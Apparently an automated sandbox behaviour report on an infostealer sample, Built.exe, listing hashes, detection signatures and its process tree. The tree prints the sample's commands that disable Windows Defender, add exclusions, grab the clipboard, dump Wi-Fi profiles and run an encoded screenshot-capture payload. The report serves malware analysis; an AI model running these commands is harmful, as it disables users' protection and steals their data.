Analysis
-
max time kernel
139s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-11-2024 15:36
Behavioral task
behavioral1
Sample
Built.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20241007-en
General
-
Target
Built.exe
-
Size
6.9MB
-
MD5
b2883b455020c7a367c7b8869913953e
-
SHA1
6dac0809e769df4b31ce50c547e84d07de8116d1
-
SHA256
fb3c50b01841e6e0bf31a37293fdfe68018328eb99bb16749798aaeab647f966
-
SHA512
896601e32432ba669af27d38d69fab48210b5d6798b370954918b1a6e43b8cdb5180cbe301e413bb2846d8c9a637dd005db465fff2c63e894770f149a90bdc58
-
SSDEEP
98304:XVpVHDjWM8JEE1FpPamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGh+:zl0CeNTfm/pf+xk4dWRpmrbW3jmrQ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4604 powershell.exe 4704 powershell.exe 2240 powershell.exe 1292 powershell.exe 2544 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exeBuilt.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 2088 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid process 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe 2184 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 27 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 2948 tasklist.exe 1424 tasklist.exe 464 tasklist.exe 4968 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI22562\python311.dll upx behavioral2/memory/2184-24-0x00007FF989D40000-0x00007FF98A328000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_ctypes.pyd upx behavioral2/memory/2184-47-0x00007FF9994B0000-0x00007FF9994D4000-memory.dmp upx behavioral2/memory/2184-48-0x00007FF999EF0000-0x00007FF999EFF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI22562\libffi-8.dll upx behavioral2/memory/2184-54-0x00007FF999500000-0x00007FF99952D000-memory.dmp upx behavioral2/memory/2184-56-0x00007FF99CBF0000-0x00007FF99CC09000-memory.dmp upx behavioral2/memory/2184-58-0x00007FF999270000-0x00007FF999293000-memory.dmp upx behavioral2/memory/2184-60-0x00007FF989970000-0x00007FF989AE3000-memory.dmp upx behavioral2/memory/2184-64-0x00007FF999330000-0x00007FF99933D000-memory.dmp upx behavioral2/memory/2184-62-0x00007FF9994E0000-0x00007FF9994F9000-memory.dmp upx behavioral2/memory/2184-66-0x00007FF999200000-0x00007FF99922E000-memory.dmp upx behavioral2/memory/2184-71-0x00007FF989280000-0x00007FF989338000-memory.dmp upx behavioral2/memory/2184-74-0x00007FF9994B0000-0x00007FF9994D4000-memory.dmp upx behavioral2/memory/2184-73-0x00007FF988F00000-0x00007FF989275000-memory.dmp upx behavioral2/memory/2184-70-0x00007FF989D40000-0x00007FF98A328000-memory.dmp upx behavioral2/memory/2184-79-0x00007FF9990B0000-0x00007FF9990BD000-memory.dmp upx behavioral2/memory/2184-78-0x00007FF999500000-0x00007FF99952D000-memory.dmp upx behavioral2/memory/2184-84-0x00007FF988DE0000-0x00007FF988EFC000-memory.dmp upx behavioral2/memory/2184-83-0x00007FF99CBF0000-0x00007FF99CC09000-memory.dmp upx behavioral2/memory/2184-76-0x00007FF9991E0000-0x00007FF9991F4000-memory.dmp upx behavioral2/memory/2184-113-0x00007FF999270000-0x00007FF999293000-memory.dmp upx behavioral2/memory/2184-205-0x00007FF989970000-0x00007FF989AE3000-memory.dmp upx behavioral2/memory/2184-225-0x00007FF9994E0000-0x00007FF9994F9000-memory.dmp upx behavioral2/memory/2184-297-0x00007FF999200000-0x00007FF99922E000-memory.dmp upx behavioral2/memory/2184-309-0x00007FF989280000-0x00007FF989338000-memory.dmp upx behavioral2/memory/2184-321-0x00007FF988F00000-0x00007FF989275000-memory.dmp upx behavioral2/memory/2184-336-0x00007FF988DE0000-0x00007FF988EFC000-memory.dmp upx behavioral2/memory/2184-347-0x00007FF989280000-0x00007FF989338000-memory.dmp upx behavioral2/memory/2184-346-0x00007FF999200000-0x00007FF99922E000-memory.dmp upx behavioral2/memory/2184-345-0x00007FF999330000-0x00007FF99933D000-memory.dmp upx behavioral2/memory/2184-344-0x00007FF9994E0000-0x00007FF9994F9000-memory.dmp upx behavioral2/memory/2184-343-0x00007FF989970000-0x00007FF989AE3000-memory.dmp upx behavioral2/memory/2184-342-0x00007FF999270000-0x00007FF999293000-memory.dmp upx behavioral2/memory/2184-341-0x00007FF99CBF0000-0x00007FF99CC09000-memory.dmp upx behavioral2/memory/2184-340-0x00007FF999500000-0x00007FF99952D000-memory.dmp upx behavioral2/memory/2184-339-0x00007FF999EF0000-0x00007FF999EFF000-memory.dmp upx behavioral2/memory/2184-338-0x00007FF9994B0000-0x00007FF9994D4000-memory.dmp upx behavioral2/memory/2184-337-0x00007FF988F00000-0x00007FF989275000-memory.dmp upx behavioral2/memory/2184-335-0x00007FF9990B0000-0x00007FF9990BD000-memory.dmp upx behavioral2/memory/2184-334-0x00007FF9991E0000-0x00007FF9991F4000-memory.dmp upx behavioral2/memory/2184-322-0x00007FF989D40000-0x00007FF98A328000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4604 powershell.exe 4604 powershell.exe 4604 powershell.exe 4704 powershell.exe 4704 powershell.exe 2240 powershell.exe 2240 powershell.exe 832 powershell.exe 832 powershell.exe 2240 powershell.exe 2240 powershell.exe 2924 powershell.exe 2924 powershell.exe 4704 powershell.exe 4704 powershell.exe 832 powershell.exe 2924 powershell.exe 1292 powershell.exe 1292 powershell.exe 4776 powershell.exe 4776 powershell.exe 4776 powershell.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 2768 powershell.exe 2768 powershell.exe 2768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exepowershell.exetasklist.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4604 powershell.exe Token: SeDebugPrivilege 464 tasklist.exe Token: SeDebugPrivilege 1424 tasklist.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 4704 powershell.exe Token: SeIncreaseQuotaPrivilege 1904 WMIC.exe Token: SeSecurityPrivilege 1904 WMIC.exe Token: SeTakeOwnershipPrivilege 1904 WMIC.exe Token: SeLoadDriverPrivilege 1904 WMIC.exe Token: SeSystemProfilePrivilege 1904 WMIC.exe Token: SeSystemtimePrivilege 1904 WMIC.exe Token: SeProfSingleProcessPrivilege 1904 WMIC.exe Token: SeIncBasePriorityPrivilege 1904 WMIC.exe Token: SeCreatePagefilePrivilege 1904 WMIC.exe Token: SeBackupPrivilege 1904 WMIC.exe Token: SeRestorePrivilege 1904 WMIC.exe Token: SeShutdownPrivilege 1904 WMIC.exe Token: SeDebugPrivilege 1904 WMIC.exe Token: SeSystemEnvironmentPrivilege 1904 WMIC.exe Token: SeRemoteShutdownPrivilege 1904 WMIC.exe Token: SeUndockPrivilege 1904 WMIC.exe Token: SeManageVolumePrivilege 1904 WMIC.exe Token: 33 1904 WMIC.exe Token: 34 1904 WMIC.exe Token: 35 1904 WMIC.exe Token: 36 1904 WMIC.exe Token: SeDebugPrivilege 832 powershell.exe Token: SeDebugPrivilege 4968 tasklist.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeIncreaseQuotaPrivilege 1904 WMIC.exe Token: SeSecurityPrivilege 1904 WMIC.exe Token: SeTakeOwnershipPrivilege 1904 WMIC.exe Token: SeLoadDriverPrivilege 1904 WMIC.exe Token: SeSystemProfilePrivilege 1904 WMIC.exe Token: SeSystemtimePrivilege 1904 WMIC.exe Token: SeProfSingleProcessPrivilege 1904 WMIC.exe Token: SeIncBasePriorityPrivilege 1904 WMIC.exe Token: SeCreatePagefilePrivilege 1904 WMIC.exe Token: SeBackupPrivilege 1904 WMIC.exe Token: SeRestorePrivilege 1904 WMIC.exe Token: SeShutdownPrivilege 1904 WMIC.exe Token: SeDebugPrivilege 1904 WMIC.exe Token: SeSystemEnvironmentPrivilege 1904 WMIC.exe Token: SeRemoteShutdownPrivilege 1904 WMIC.exe Token: SeUndockPrivilege 1904 WMIC.exe Token: SeManageVolumePrivilege 1904 WMIC.exe Token: 33 1904 WMIC.exe Token: 34 1904 WMIC.exe Token: 35 1904 WMIC.exe Token: 36 1904 WMIC.exe Token: SeDebugPrivilege 2948 tasklist.exe Token: SeDebugPrivilege 1292 powershell.exe Token: SeDebugPrivilege 4776 powershell.exe Token: SeIncreaseQuotaPrivilege 2128 WMIC.exe Token: SeSecurityPrivilege 2128 WMIC.exe Token: SeTakeOwnershipPrivilege 2128 WMIC.exe Token: SeLoadDriverPrivilege 2128 WMIC.exe Token: SeSystemProfilePrivilege 2128 WMIC.exe Token: SeSystemtimePrivilege 2128 WMIC.exe Token: SeProfSingleProcessPrivilege 2128 WMIC.exe Token: SeIncBasePriorityPrivilege 2128 WMIC.exe Token: SeCreatePagefilePrivilege 2128 WMIC.exe Token: SeBackupPrivilege 2128 WMIC.exe Token: SeRestorePrivilege 2128 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Built.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2256 wrote to memory of 2184 2256 Built.exe Built.exe PID 2256 wrote to memory of 2184 2256 Built.exe Built.exe PID 2184 wrote to memory of 4320 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4320 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4740 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4740 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4980 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4980 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2544 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2544 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2120 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2120 2184 Built.exe cmd.exe PID 4980 wrote to memory of 4604 4980 cmd.exe powershell.exe PID 4980 wrote to memory of 4604 4980 cmd.exe powershell.exe PID 2544 wrote to memory of 464 2544 cmd.exe tasklist.exe PID 2544 wrote to memory of 464 2544 cmd.exe tasklist.exe PID 2120 wrote to memory of 1424 2120 cmd.exe tasklist.exe PID 2120 wrote to memory of 1424 2120 cmd.exe tasklist.exe PID 4320 wrote to memory of 4704 4320 cmd.exe powershell.exe PID 4320 wrote to memory of 4704 4320 cmd.exe powershell.exe PID 4740 wrote to memory of 2240 4740 cmd.exe powershell.exe PID 4740 wrote to memory of 2240 4740 cmd.exe powershell.exe PID 2184 wrote to memory of 1988 2184 Built.exe cvtres.exe PID 2184 wrote to memory of 1988 2184 Built.exe cvtres.exe PID 2184 wrote to memory of 2412 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2412 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2888 2184 Built.exe cmd.exe PID 2184 wrote to memory of 2888 2184 Built.exe cmd.exe PID 2184 wrote to memory of 1176 2184 Built.exe cmd.exe PID 2184 wrote to memory of 1176 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4888 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4888 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4884 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4884 2184 Built.exe cmd.exe PID 1988 wrote to memory of 1904 1988 cmd.exe WMIC.exe PID 1988 wrote to memory of 1904 1988 cmd.exe WMIC.exe PID 2184 wrote to memory of 3808 2184 Built.exe WaaSMedicAgent.exe PID 2184 wrote to memory of 3808 2184 Built.exe WaaSMedicAgent.exe PID 2412 wrote to memory of 4968 2412 cmd.exe tasklist.exe PID 2412 wrote to memory of 4968 2412 cmd.exe tasklist.exe PID 2184 wrote to memory of 1180 2184 Built.exe cmd.exe PID 2184 wrote to memory of 1180 2184 Built.exe cmd.exe PID 2888 wrote to memory of 832 2888 cmd.exe powershell.exe PID 2888 wrote to memory of 832 2888 cmd.exe powershell.exe PID 1176 wrote to memory of 512 1176 cmd.exe netsh.exe PID 1176 wrote to memory of 512 1176 cmd.exe netsh.exe PID 4888 wrote to memory of 1956 4888 cmd.exe tree.com PID 4888 wrote to memory of 1956 4888 cmd.exe tree.com PID 4884 wrote to memory of 2540 4884 cmd.exe systeminfo.exe PID 4884 wrote to memory of 2540 4884 cmd.exe systeminfo.exe PID 3808 wrote to memory of 2128 3808 cmd.exe reg.exe PID 3808 wrote to memory of 2128 3808 cmd.exe reg.exe PID 1180 wrote to memory of 2924 1180 cmd.exe powershell.exe PID 1180 wrote to memory of 2924 1180 cmd.exe powershell.exe PID 2184 wrote to memory of 3856 2184 Built.exe cmd.exe PID 2184 wrote to memory of 3856 2184 Built.exe cmd.exe PID 3856 wrote to memory of 788 3856 cmd.exe tree.com PID 3856 wrote to memory of 788 3856 cmd.exe tree.com PID 2184 wrote to memory of 3152 2184 Built.exe cmd.exe PID 2184 wrote to memory of 3152 2184 Built.exe cmd.exe PID 3152 wrote to memory of 3764 3152 cmd.exe tree.com PID 3152 wrote to memory of 3764 3152 cmd.exe tree.com PID 2184 wrote to memory of 4260 2184 Built.exe cmd.exe PID 2184 wrote to memory of 4260 2184 Built.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2828 attrib.exe 4192 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4604 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:1176 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:512 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1956
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
